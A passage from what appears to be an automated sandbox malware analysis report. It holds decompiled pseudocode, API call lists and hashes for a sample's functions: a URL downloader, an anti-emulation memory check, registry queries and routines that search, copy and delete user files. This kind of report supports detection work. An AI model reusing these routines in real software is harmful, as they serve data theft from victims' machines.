SelectObject.GDI32(?,00000000), ref: 0040F1D4
GlobalFix.KERNEL32(?), ref: 0040F248
GlobalSize.KERNEL32(?), ref: 0040F253

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 00403F95: lstrlen.KERNEL32(?), ref: 00403FEE
Part of subcall function 00403F95: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040403D
Part of subcall function 00403F95: StrCmpCA.SHLWAPI(?), ref: 00404052

SelectObject.GDI32(?,?), ref: 0040F292
DeleteObject.GDI32(?), ref: 0040F2AD
DeleteObject.GDI32(?), ref: 0040F2B6
CloseWindow.USER32(?), ref: 0040F2CB

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Object$Window$DeleteGlobalSelect$CloseDesktopInternetOpenRectSizelstrcpylstrlen
String ID:
API String ID: 345882496-0
Opcode ID: fcef7f20417e5028789ae7d1ce6b868ad66607ad5a39f70a74bff164aa410584
Instruction ID: 8be6d525fa3b4e5a96eb3d8f2ade2db000c53b6ae2c9fcda6107e08eb5416c36
Opcode Fuzzy Hash: fcef7f20417e5028789ae7d1ce6b868ad66607ad5a39f70a74bff164aa410584
Instruction Fuzzy Hash: 8A51E572800519EFDF11AFE1DD499EEBFBAFF48311B18902AF502A21A0D7354A55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00405394 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00405394(void** __ebx, long* __esi, char _a4) {
				struct _OVERLAPPED* _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				long _v24;
				void* _t15;
				long _t21;
				void* _t22;
				int _t23;
				void** _t26;

				_t26 = __ebx;
				_t1 =  &_a4; // 0x406463
				_v8 = 0;
				_t15 = CreateFileA( *_t1, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v12 = _t15;
				if(_t15 == 0 || _t15 == 0xffffffff) {
					L10:
					E00401859(_a4);
					return _v8;
				} else {
					_push( &_v24);
					_push(_t15);
					if( *0x6155e8() != 0 && _v20 == 0) {
						_t21 = _v24;
						 *__esi = _t21; // executed
						_t22 = LocalAlloc(0x40, _t21); // executed
						 *__ebx = _t22;
						if(_t22 != 0) {
							_t23 = ReadFile(_v12, _t22,  *__esi,  &_v16, 0); // executed
							if(_t23 == 0 ||  *__esi != _v16) {
								_v8 = 0;
								LocalFree( *_t26);
							} else {
								_v8 = 1;
							}
						}
					}
					FindCloseChangeNotification(_v12); // executed
					goto L10;
				}
			}

0x00405394
0x004053a9
0x004053ac
0x004053af
0x004053b5
0x004053ba
0x00405422
0x00405425
0x0040542f
0x004053c1
0x004053c4
0x004053c5
0x004053ce
0x004053d5
0x004053db
0x004053dd
0x004053e3
0x004053e7
0x004053f4
0x004053fc
0x00405410
0x00405413
0x00405405
0x00405405
0x00405405
0x004053fc
0x004053e7
0x0040541c
0x00000000
0x0040541c

APIs

CreateFileA.KERNEL32(cd@,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,00406463,?,?,?,?), ref: 004053AF
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00406463,?,?,?,?), ref: 004053C6
LocalAlloc.KERNEL32(00000040,?,?,?,?,00406463,?,?,?,?), ref: 004053DD
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00406463,?,?,?,?), ref: 004053F4
LocalFree.KERNEL32(?,?,?,?,00406463,?,?,?,?), ref: 00405413
FindCloseChangeNotification.KERNEL32(?,?,?,?,00406463,?,?,?,?), ref: 0040541C

Strings

cd@, xrefs: 004053A9

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: cd@
API String ID: 1815715184-3265086296
Opcode ID: a137e5278a1303517d8623a954b0a7de2e4b1a5e71c845429b2ee07b1927af69
Instruction ID: 720f3f37167a67eca98d90138863428f2b1cf1d99be7d51710254306301150fe
Opcode Fuzzy Hash: a137e5278a1303517d8623a954b0a7de2e4b1a5e71c845429b2ee07b1927af69
Instruction Fuzzy Hash: 35118E74900604EFCF21AFA5DC48EEFBBB9EB84301F24452AF402B6290D3348A81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00403ECB Relevance: 10.6, APIs: 7, Instructions: 69
networkmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403ECB(char* _a4) {
				long _v12;
				char* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void _v1064;
				void* _t29;
				void* _t30;
				void* _t35;
				void* _t41;
				void* _t53;
				void* _t54;

				_v12 = 1;
				_t29 = RtlAllocateHeap(GetProcessHeap(), 0, 0x5f5e0ff); // executed
				_v20 = _t29;
				_t30 = InternetOpenA(0x411be1, 0, 0, 0, 0);
				_v32 = _t30;
				_v24 = InternetOpenUrlA(_t30, _a4, 0, 0, 0x4000100, 0);
				_v16 = 0;
				while(_v12 > 0) {
					InternetReadFile(_v24,  &_v1064, 0x400,  &_v12); // executed
					_t35 = 0;
					if(_v12 > 0) {
						do {
							_v36 = _t53 + _t35 - 0x424;
							_v28 = _v16 + _v20;
							_t41 = memcpy(_v28, _v36, 1);
							_t54 = _t54 + 0xc;
							_v16 = _v16 + 1;
							_t35 = _t41 + 1;
						} while (_t35 < _v12);
						continue;
					}
					break;
				}
				InternetCloseHandle(_v24);
				InternetCloseHandle(_v32);
				E00401859(_a4);
				return _v20;
			}

0x00403edf
0x00403eed
0x00403efc
0x00403eff
0x00403f10
0x00403f1a
0x00403f1d
0x00403f6b
0x00403f35
0x00403f3b
0x00403f40
0x00403f42
0x00403f49
0x00403f52
0x00403f60
0x00403f60
0x00403f62
0x00403f65
0x00403f66
0x00000000
0x00403f42
0x00000000
0x00403f40
0x00403f73
0x00403f7c
0x00403f85
0x00403f94

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?), ref: 00403EE6
RtlAllocateHeap.NTDLL(00000000), ref: 00403EED
InternetOpenA.WININET(00411BE1,00000000,00000000,00000000,00000000), ref: 00403EFF
InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00403F14
InternetReadFile.WININET(?,?,00000400,00000001), ref: 00403F35
InternetCloseHandle.WININET(?), ref: 00403F73
InternetCloseHandle.WININET(?), ref: 00403F7C

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 164dca8ab990a0c1310890173f359f52071d945061978152ea3efd8f6b76a345
Instruction ID: 7b6d3068283392e3239f3bc2d7bd16ec7d75af9299b59e1eba2fe2eaa61876bc
Opcode Fuzzy Hash: 164dca8ab990a0c1310890173f359f52071d945061978152ea3efd8f6b76a345
Instruction Fuzzy Hash: 8D21C9B5D00219EFDB00AFA4DC899EEBBBDFB48345F548466F612A2290C7745E40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401010 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00401010(void* __ecx) {
				void* _v8;
				void* _t7;
				void* _t8;
				int _t10;
				void* _t13;
				void* _t19;
				void* _t24;

				_t7 =  *0x615788(GetCurrentProcess(), 0, 0x7d0, 0x3000, 0x40, 0, _t19, _t24, _t13, __ecx); // executed
				if(_t7 == 0) {
					ExitProcess(0);
				}
				_t8 = VirtualAlloc(0, 0x17c841c0, 0x3000, 4); // executed
				_v8 = _t8;
				_push(_t8);
				if(_t8 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t10);
				if(_v8 != 0) {
					memset(_v8, 0, 0x5e69ec0 << 0);
					_push(_t13);
					asm("cld");
					_t10 = VirtualFree(_v8, 0x17c841c0, 0x8000);
				}
				return _t10;
			}

0x0040102f
0x00401037
0x0040103a
0x0040103a
0x0040104a
0x00401050
0x00401053
0x00401057
0x0040105b
0x0040105c
0x00401060
0x00401061
0x00401065
0x00401074
0x00401076
0x0040107b
0x00401086
0x00401086
0x00401090

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,76636410,1852,00411C74,?,?,0040DE7F), ref: 00401028
VirtualAllocExNuma.KERNEL32(00000000,?,?,0040DE7F), ref: 0040102F
ExitProcess.KERNEL32 ref: 0040103A
VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,0040DE7F), ref: 0040104A
VirtualFree.KERNEL32(?,17C841C0,00008000,?,?,0040DE7F), ref: 00401086

Strings

1852, xrefs: 00401015

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma
String ID: 1852
API String ID: 3477276466-692938694
Opcode ID: ec2a210ca5f67e4100478db12a95b5b12a56525c1e95edcfb6eaacfd7e871be6
Instruction ID: 694585f2aaeb6b300176e28428514de589af73c13cc964ac978f57c36df7f110
Opcode Fuzzy Hash: ec2a210ca5f67e4100478db12a95b5b12a56525c1e95edcfb6eaacfd7e871be6
Instruction Fuzzy Hash: DA01F772601114FBD7105B669C4DFEBBBBDDB82B61F245026F246F3290D6355D00D6B4

Uniqueness

Uniqueness Score: -1.00%

Function 0040B807 Relevance: 9.1, APIs: 6, Instructions: 112
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040B807(char _a4) {
				void* _v8;
				int _v12;
				void* _v16;
				char _v284;
				void _v539;
				char _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t92;
				void* _t93;

				_v12 = 0xff;
				_v540 = 0;
				memset( &_v539, 0, 0xfe);
				_t93 = _t92 + 0xc;
				if(RegOpenKeyExA(0x80000001,  *0x61540c, 0, 0x20119,  &_v8) == 0) {
					RegQueryValueExA(_v8,  *0x61503c, 0, 0,  &_v540,  &_v12);
				}
				RegCloseKey(_v8);
				_v16 =  &_v284;
				memset(_v16, 0, 0x104 << 0);
				 *0x61575c();
				 *0x61575c();
				_t95 = _t93 + 0xc - 0x50;
				_t66 =  &_a4;
				E004016EB( &_a4, _t93 + 0xc - 0x50);
				E0040B62A( &_v540,  *0x6150b0,  &_v284); // executed
				E004016EB( &_a4, _t93 + 0xc - 0x50);
				E0040B62A( &_v284,  *0x61538c,  *0x6150c0); // executed
				E004016EB(_t66, _t95);
				E0040B62A( &_v284,  *0x6153ec,  &_v284); // executed
				E004016EB(_t66, _t95);
				E0040B62A( &_v284,  *0x6150bc,  &_v540);
				E004016EB(_t66, _t95);
				_push( *0x615344);
				E0040B62A();
				E004016EB(_t66, _t95);
				E0040B62A( &_v284,  *0x6151d0,  &_v284);
				_v16 =  &_v284;
				memset(_v16, 0, 0x104 << 0);
				return E004016CC(_t66);
			}

0x0040b822
0x0040b829
0x0040b82f
0x0040b834
0x0040b854
0x0040b86c
0x0040b86c
0x0040b875
0x0040b881
0x0040b88e
0x0040b89e
0x0040b8b1
0x0040b8b7
0x0040b8ba
0x0040b8bf
0x0040b8d1
0x0040b8da
0x0040b8ec
0x0040b8f5
0x0040b907
0x0040b910
0x0040b922
0x0040b92b
0x0040b930
0x0040b93d
0x0040b946
0x0040b958
0x0040b966
0x0040b973
0x0040b980

APIs

memset.MSVCRT ref: 0040B82F
RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,0040D62D,?,00000000,?), ref: 0040B84C
RegQueryValueExA.ADVAPI32(0040D62D,00000000,00000000,?,000000FF,?,00000000,?), ref: 0040B86C
RegCloseKey.ADVAPI32(0040D62D,?,00000000,?), ref: 0040B875
lstrcat.KERNEL32(?,?), ref: 0040B89E
lstrcat.KERNEL32(?), ref: 0040B8B1

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 1e4041d75375bf8f21082ecbc5025d61b0dfc5b8a8cde8dd5d055a997b38079c
Instruction ID: 76db2230d02402118bcbd5a41effb76f5bd227c3511322053591a7601c859284
Opcode Fuzzy Hash: 1e4041d75375bf8f21082ecbc5025d61b0dfc5b8a8cde8dd5d055a997b38079c
Instruction Fuzzy Hash: 4441677280050CEFDB44ABE1DC869DDB7BDEB44314F1484A7F109E3161EE359A858BD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040935F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 165
stringCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0040935F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, char _a48, intOrPtr _a92, intOrPtr _a96, void* _a100, intOrPtr _a104) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v28;
				char _v40;
				char _v52;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t52;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t106;
				void* _t113;
				void* _t115;
				intOrPtr _t118;
				void* _t143;
				void* _t148;
				void* _t149;
				void* _t150;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t159 = __eflags;
				E00410148(__ecx, 0x6159e0, 0x411be1);
				E004052A5(_t106, __edx, _t115, _t159, _a92, _a96); // executed
				_v12 = _v12 & 0x00000000;
				_pop(_t113);
				if(_a104 > 0) {
					_t118 = _a8 + 0xc;
					_v8 = _t118;
					do {
						_t8 = _t118 + 0xc; // 0x8964c483
						_t63 =  *0x615784( *_t8,  *0x615200);
						_t162 = _t63;
						if(_t63 == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t148 = _t143 - 0xffffffffffffffc0;
							asm("movsd");
							E004016EB( &_a12, _t148);
							_push(_a4);
							_t118 = _v8;
							_t149 = _t148 - 0xc;
							E0041011F(_t118 - 0xc, _t113, _t149, _t162);
							_t150 = _t149 - 0xc;
							E0041011F(_t118, _t113, _t150, _t162); // executed
							E00408DF3(_t113, _t162); // executed
							_t143 = _t150 + 0x7c;
						}
						_t14 = _t118 + 0xc; // 0x8964c483
						_t65 =  *0x615784( *_t14,  *0x615364);
						_t163 = _t65;
						if(_t65 == 0) {
							E004100ED( &_v28, _t163, 0x411be1);
							_v16 = _t118 + 0xfffffff4;
							E0041018C(E00410208(E004101C6(E00410208( &_v28, _t113,  &_v64, _t163, 0x411be4), _t113, _t118 + 0xfffffff4,  &_v52, _t163), _t113,  &_v40, _t163, 0x411be4), _t113,  &_v28);
							E00401859(_v40);
							E00401859(_v52);
							E00401859(_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t152 = _t143 - 0xffffffffffffffc0;
							asm("movsd");
							E004016EB( &_a12, _t152);
							_push(_a4);
							_t153 = _t152 - 0xc;
							E0041011F( &_v28, _t113, _t153, _t163);
							_t154 = _t153 - 0xc;
							E0041011F(_v16, _t113, _t154, _t163);
							_t155 = _t154 - 0xc;
							E0041011F(_v8, _t113, _t155, _t163); // executed
							E00408FC8(_t113, _t163); // executed
							_t143 = _t155 + 0x88;
							E00401859(_v28);
							_v28 = _v28 & 0x00000000;
							_v20 = _v20 & 0x00000000;
							E00401859(0);
							_t118 = _v8;
						}
						_t37 = _t118 + 0xc; // 0x8964c483
						_t67 =  *0x615784( *_t37,  *0x6154b8);
						_t165 = _t67;
						if(_t67 == 0) {
							_t156 = _t143 - 0x50;
							E004016EB( &_a12, _t156);
							_t118 = _v8;
							_t157 = _t156 - 0xc;
							E0041011F(_t118 - 0xc, _t113, _t157, _t165);
							_t158 = _t157 - 0xc;
							E0041011F(_t118, _t113, _t158, _t165); // executed
							E004091FA(_t113, _t165); // executed
							_t143 = _t158 + 0x68;
						}
						_v12 = _v12 + 1;
						_t118 = _t118 + 0x24;
						_v8 = _t118;
						_t166 = _v12 - _a104;
					} while (_v12 < _a104);
				}
				_t52 =  *0x6159e0; // 0x469010
				_push( *0x61567c(_t52));
				_push(_t52);
				E0041011F( &_a48, _t113, _t143 - 0xc, _t166);
				E004016EB( &_a12, _t143 - 0xffffffffffffffbc);
				_push( &_v64);
				E00403F95(_t113, _t166);
				E00401859(_v64);
				return E004016CC( &_a12);
			}

0x0040935f
0x00409372
0x0040937d
0x00409382
0x0040938b
0x0040938c
0x00409395
0x00409398
0x0040939b
0x004093a1
0x004093a5
0x004093ab
0x004093ad
0x004093b7
0x004093b8
0x004093b9
0x004093ba
0x004093bd
0x004093c3
0x004093c8
0x004093cb
0x004093ce
0x004093d6
0x004093db
0x004093e2
0x004093e7
0x004093ec
0x004093ec
0x004093f5
0x004093f9
0x004093ff
0x00409401
0x0040940f
0x00409424
0x0040943f
0x00409447
0x0040944f
0x00409457
0x00409464
0x00409465
0x00409466
0x00409467
0x0040946a
0x00409470
0x00409475
0x0040947b
0x00409480
0x00409488
0x0040948d
0x00409495
0x0040949a
0x0040949f
0x004094a7
0x004094ad
0x004094b2
0x004094b6
0x004094bc
0x004094c1
0x004094c1
0x004094ca
0x004094ce
0x004094d4
0x004094d6
0x004094d8
0x004094e0
0x004094e5
0x004094e8
0x004094f0
0x004094f5
0x004094fc
0x00409501
0x00409506
0x00409506
0x00409509
0x0040950f
0x00409512
0x00409515
0x00409515
0x0040939b
0x0040951e
0x0040952c
0x0040952d
0x00409536
0x00409543
0x0040954b
0x0040954c
0x00409557
0x00409567

APIs

Part of subcall function 00410148: lstrlen.KERNEL32(?,?,0040D27A,00411BE1,00411BE1,76636410,1852,00411C74,?,0040E6D0), ref: 0041014E
Part of subcall function 00410148: lstrcpy.KERNEL32(00000000,00000000), ref: 00410180

Part of subcall function 004052A5: malloc.MSVCRT ref: 004052AD

StrCmpCA.SHLWAPI(8964C483), ref: 004093A5
StrCmpCA.SHLWAPI(8964C483), ref: 004093F9
StrCmpCA.SHLWAPI(8964C483), ref: 004094CE

Part of subcall function 0041011F: lstrcpy.KERNEL32(00000000,?), ref: 0041013E

lstrlen.KERNEL32(00469010), ref: 00409526

Strings

Ya, xrefs: 0040936D

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpylstrlen$malloc
String ID: Ya
API String ID: 2987604026-3053265743
Opcode ID: c9694603f0512622547e22ed9ce10a7d5a63604fca98b03b9b2dc57dee6daa78
Instruction ID: 2e72b6533f2caf0d3b70bcb78c0a955e10e72b6b63472c948aef73ccc8aed6b7
Opcode Fuzzy Hash: c9694603f0512622547e22ed9ce10a7d5a63604fca98b03b9b2dc57dee6daa78
Instruction Fuzzy Hash: 68516E32D00508ABCB00FFB5D9476CEB775AF40318F54412AFD14B7262DA79AE588BC9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BDA2 Relevance: 8.9, APIs: 7, Instructions: 115
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040BDA2(void* __eflags, char _a4) {
				void* _v8;
				char _v20;
				char _v284;
				char _v548;
				char _v812;
				char _v1076;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t64;
				void* _t84;
				void* _t110;
				void* _t138;
				void* _t143;
				void* _t144;
				void* _t149;
				void* _t150;

				_t150 = __eflags;
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v1076;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v548;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v812;
				memset(_v8, 0, 0x104 << 0);
				 *0x61575c( &_v1076,  *0x615258);
				_t64 = E0040EFE3( &_v20, 0x1a);
				_pop(_t110);
				 *0x61575c( &_v284,  *_t64);
				E00401859(_v20);
				 *0x61575c( &_v284,  &_v1076);
				 *0x61575c( &_v548,  &_v284);
				 *0x61575c( &_v548,  *0x6151d8);
				 *0x61575c( &_v812,  &_v284);
				 *0x61575c( *0x615218);
				_t143 = _t138 + 0x30 - 0xc;
				E004100ED(_t143, _t150,  &_v548); // executed
				_t84 = E0040EFB9( &_v812); // executed
				_t144 = _t143 + 0xc;
				if(_t84 != 0) {
					_t149 = _t144 - 0x50;
					E004016EB( &_a4, _t149);
					_push( &_v812);
					E0040BBCE(_t110);
					_t144 = _t149 + 0x54;
				}
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v1076;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v548;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v812;
				memset(_v8, 0, 0x104 << 0);
				return E004016CC( &_a4);
			}

0x0040bda2
0x0040bdb4
0x0040bdc1
0x0040bdc9
0x0040bdd6
0x0040bdde
0x0040bdeb
0x0040bdf3
0x0040be00
0x0040be0f
0x0040be1a
0x0040be1f
0x0040be29
0x0040be32
0x0040be45
0x0040be59
0x0040be6c
0x0040be80
0x0040be93
0x0040be99
0x0040bea5
0x0040beaa
0x0040beaf
0x0040beb4
0x0040beb6
0x0040bebe
0x0040bec9
0x0040beca
0x0040becf
0x0040becf
0x0040bed8
0x0040bee5
0x0040beed
0x0040befa
0x0040bf02
0x0040bf0f
0x0040bf17
0x0040bf24
0x0040bf32

APIs

lstrcat.KERNEL32(?), ref: 0040BE0F

Part of subcall function 0040EFE3: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00411BE1,?), ref: 0040F014

lstrcat.KERNEL32(?,00000000), ref: 0040BE29
lstrcat.KERNEL32(?,?), ref: 0040BE45
lstrcat.KERNEL32(?,?), ref: 0040BE59
lstrcat.KERNEL32(?), ref: 0040BE6C
lstrcat.KERNEL32(?,?), ref: 0040BE80
lstrcat.KERNEL32(?), ref: 0040BE93

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 0040EFB9: GetFileAttributesA.KERNEL32(?,?,?,004092CC,?,?,?), ref: 0040EFC0

Part of subcall function 0040BBCE: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 0040BBE1
Part of subcall function 0040BBCE: RtlAllocateHeap.NTDLL(00000000), ref: 0040BBE8
Part of subcall function 0040BBCE: wsprintfA.USER32 ref: 0040BC00
Part of subcall function 0040BBCE: FindFirstFileA.KERNEL32(?,?), ref: 0040BC17
Part of subcall function 0040BBCE: StrCmpCA.SHLWAPI(?,00411BF0), ref: 0040BC34
Part of subcall function 0040BBCE: StrCmpCA.SHLWAPI(?,00411BF4), ref: 0040BC4A
Part of subcall function 0040BBCE: wsprintfA.USER32 ref: 0040BC6A
Part of subcall function 0040BBCE: CopyFileA.KERNEL32(?,?,00000001), ref: 0040BC83
Part of subcall function 0040BBCE: DeleteFileA.KERNEL32(?), ref: 0040BCAF
Part of subcall function 0040BBCE: FindNextFileA.KERNEL32(00000000,?), ref: 0040BCBD
Part of subcall function 0040BBCE: FindClose.KERNEL32(00000000), ref: 0040BCCC
Part of subcall function 0040BBCE: lstrcat.KERNEL32(?), ref: 0040BCF4
Part of subcall function 0040BBCE: lstrcat.KERNEL32(?), ref: 0040BD07
Part of subcall function 0040BBCE: lstrlen.KERNEL32(0040BECF), ref: 0040BD10
Part of subcall function 0040BBCE: lstrlen.KERNEL32(0040BECF), ref: 0040BD1D

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$File$Find$Heaplstrlenwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcesslstrcpy
String ID:
API String ID: 3089043237-0
Opcode ID: b2e5633c00299bd2585cccd0d7583854ee72bdaf851f72599b8c2326fdce744e
Instruction ID: 9805f75b80288d6cd9c34710aa96b21bf7869d3a7dc75d7c546e04f448e9dfb6
